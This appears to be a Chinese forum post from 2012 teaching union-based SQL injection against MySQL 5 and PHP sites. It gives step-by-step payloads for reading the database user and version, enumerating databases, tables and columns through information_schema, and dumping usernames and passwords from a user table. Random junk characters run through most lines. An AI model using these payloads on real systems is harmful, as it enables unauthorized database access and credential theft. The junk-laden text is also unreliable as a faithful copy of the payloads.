& ^* w7 U$ Z7 l; t- H" `0 T- Q6 l
教程内容:Mysql 5+php 注入
* W0 @8 n; M% Y3 Z }( i$ u! K5 ~" T& S, O2 b- k" H; H1 j
" K( P/ {' _1 ]* `, J x1 Z' b( N; Y4 n( K% ]# K7 x
一.查看MYSQL基本信息(库名,版本,用户)
5 c* b$ {: m/ {/ H# y
! i& C: N" R4 ^and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*: @9 i$ o; B' n' `9 r8 B' P- J
$ b" X. c! b/ X0 m; G& }* _二.查数据库, [5 @6 P* c% o! L! I* J. j# V
- w) |( |- V9 K/ b. Z3 D( K
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*1 `; `, x* _+ Q( w
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
* j( b1 L8 d* |4 x* ^( N4 O8 `' b6 J+ {1 V. ?
三.暴表+ w) {( c. v4 W1 H [* g
+ z" M8 [1 d7 o$ ?
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*3 ~2 o! E% [0 W: D0 L
" m$ {) f. m: h% u+ ^/ J4 R2 Ilimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。1 q8 _+ p# a# I5 u! w9 q
9 q, @) G1 m$ k( y
四.暴字段
( X ]) D. m! _: D( s8 |4 a, s" n+ d1 D8 \! o, B! I2 D2 j0 }* j
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
7 E! J. b) `* l2 b3 M- d* \" a9 q& T; o# h6 L
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。5 R$ q8 }3 u- E
. e9 d7 B4 @8 H' e0 }五.暴数据& `, E3 v5 g* g
- C! ^9 V* a, _ D& q2 ~9 E# o {5 xand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
; h8 }% }8 @4 k! ]# S6 |7 Y. x
6 t3 R1 J) r% o- c0 I1 |" x: ^1 V+ s; w7 I6 Y
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。1 X2 f. u( F% g# R. [; X3 U
|
发表于 2012-9-13 16:27:53
收藏
支持
反对